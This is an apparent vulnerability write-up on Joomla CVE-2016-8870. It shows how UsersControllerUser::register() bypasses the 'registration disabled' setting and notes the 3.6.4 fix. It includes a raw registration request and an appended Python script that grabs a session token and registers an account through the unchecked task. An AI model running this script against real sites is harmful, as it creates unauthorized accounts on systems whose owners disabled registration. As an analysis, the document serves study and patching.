Joomla unauthorized user registration vulnerability analysis (CVE-2016-8870) - Vulnerability Warning - myhack58

2016-12-01T00:00:00
ID MYHACK58:62201681702
Type myhack58
Reporter Anonymous
Modified 2016-12-01T00:00:00

Description

Experiment environment

Joomla 3.4.4 through 3.6.3

Vulnerability analysis

Joomla has two user registration methods:

  • UsersControllerRegistration::register() in components/com_users/controllers/registration.php
  • UsersControllerUser::register() in components/com_users/controllers/user.php

Compare the code of the two methods. UsersControllerRegistration::register():

```php
public function register()
{
    // Check for request forgeries.
    JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));

    // If registration is disabled - Redirect to login page.
    if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)
    {
        $this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

        return false;
    }

    $app   = JFactory::getApplication();
    $model = $this->getModel('Registration', 'UsersModel');

    // ...some other php code
}
```


UsersControllerUser::register():

```php
public function register()
{
    JSession::checkToken('post') or jexit(JText::_('JINVALID_TOKEN'));

    // Get the application
    $app = JFactory::getApplication();

    // ...some other php code
}
```

Diffing the two methods with PhpStorm's compare function (a very handy feature) shows that the only difference is this extra block in UsersControllerRegistration::register():

```php
// If registration is disabled - Redirect to login page.
if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)
{
    $this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

    return false;
}
```

This block checks whether user registration is allowed (the allowUserRegistration option of com_users); if registration is disabled, it redirects to the login page and stops. UsersControllerUser::register() has no such check, so submitting the registration form to that controller instead bypasses the setting and creates a user even when registration is turned off. The only check that remains is the session token (JSession::checkToken('post')), and any visitor can obtain a token from a public form such as the login form. Joomla 3.6.4 fixed the issue by removing UsersControllerUser::register() entirely.

Vulnerability testing

The normal registration form on the site submits to UsersControllerRegistration::register(). The registration request looks like this:

```http
POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/index.php/component/users/?view=registration
Cookie: mycookie
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------189711617232278
Content-Length: 1072

-----------------------------189711617232278
Content-Disposition: form-data; name="jform[name]"

spoock
-----------------------------189711617232278
Content-Disposition: form-data; name="jform[username]"

spoock
-----------------------------189711617232278
Content-Disposition: form-data; name="jform[password1]"

123456
-----------------------------189711617232278
Content-Disposition: form-data; name="jform[password2]"

123456
-----------------------------189711617232278
Content-Disposition: form-data; name="jform[email1]"

test@163.com
-----------------------------189711617232278
Content-Disposition: form-data; name="jform[email2]"

test@163.com
-----------------------------189711617232278
Content-Disposition: form-data; name="option"

com_users
-----------------------------189711617232278
Content-Disposition: form-data; name="task"

registration.register
-----------------------------189711617232278
Content-Disposition: form-data; name="949e7f6eaab9a1b4dc1c1702ae9f3fc6"

1
-----------------------------189711617232278--
```
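As an added example (not code from the original article or from the Joomla project), the following Python script sends the same form fields as the request above, but with task set to user.register so that the request is handled by UsersControllerUser::register() instead of UsersControllerRegistration::register(). Everything beyond the field names shown in the request is an assumption: the target base URL, that the session token can be read from the public login view as a hidden input whose name is a 32-character hex string with value 1, and the constructed login-form fragment used so the token extraction can be checked offline.

```python
# Added example: exercise the unchecked UsersControllerUser::register() task.
# Not code from the original article or from the Joomla project.
# Assumed (not stated on the page): BASE_URL, the markup of the session-token
# hidden input, and the constructed SAMPLE_LOGIN_PAGE used for offline testing.
import re
import sys
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

BASE_URL = "http://localhost/joomla"  # assumed target, from the article's Host header

# Joomla writes its session token as <input type="hidden" name="<32 hex>" value="1" />.
# The name-before-value attribute order is an assumption about the markup.
TOKEN_RE = re.compile(r'<input[^>]*\bname="([0-9a-f]{32})"[^>]*\bvalue="1"', re.IGNORECASE)

# Constructed login-form fragment (not captured from a real site) so the
# token extraction can be exercised without a live Joomla instance.
SAMPLE_LOGIN_PAGE = """
<form action="/joomla/index.php?option=com_users&task=user.login" method="post">
  <input type="text" name="username" />
  <input type="password" name="password" />
  <input type="hidden" name="return" value="aW5kZXgucGhw" />
  <input type="hidden" name="949e7f6eaab9a1b4dc1c1702ae9f3fc6" value="1" />
</form>
"""


def extract_token(html):
    """Return the session-token field name, or raise if the page has none."""
    m = TOKEN_RE.search(html)
    if m is None:
        raise ValueError("no Joomla session token in page")
    return m.group(1)


def build_form(name, username, password, email, token, task="user.register"):
    """Same jform fields as the legitimate request, different task.

    'registration.register' is what the site's own form sends;
    'user.register' routes to UsersControllerUser::register(), which skips
    the allowUserRegistration check but still calls checkToken('post'),
    so the token field must be present in the POST body."""
    return {
        "jform[name]": name,
        "jform[username]": username,
        "jform[password1]": password,
        "jform[password2]": password,
        "jform[email1]": email,
        "jform[email2]": email,
        "option": "com_users",
        "task": task,
        token: "1",
    }


def register(base_url, name, username, password, email):
    """Fetch a token from the public login view, then POST the registration."""
    jar = CookieJar()  # the token is bound to the session cookie, so keep it
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login_url = base_url + "/index.php?option=com_users&view=login"
    with opener.open(login_url) as resp:
        token = extract_token(resp.read().decode("utf-8", "replace"))
    body = urllib.parse.urlencode(
        build_form(name, username, password, email, token)).encode()
    req = urllib.request.Request(base_url + "/index.php?option=com_users", data=body)
    with opener.open(req) as resp:
        return resp.status, resp.geturl()


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: register.py NAME USERNAME PASSWORD EMAIL")
    print(register(BASE_URL, *sys.argv[1:]))
```

Running the same script with task left at registration.register is the quickest way to confirm the point of the analysis: with allowUserRegistration disabled, that path is redirected to the login view while user.register goes through. Against Joomla 3.6.4 or later, where UsersControllerUser::register() was removed, the user.register task no longer resolves to a method.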
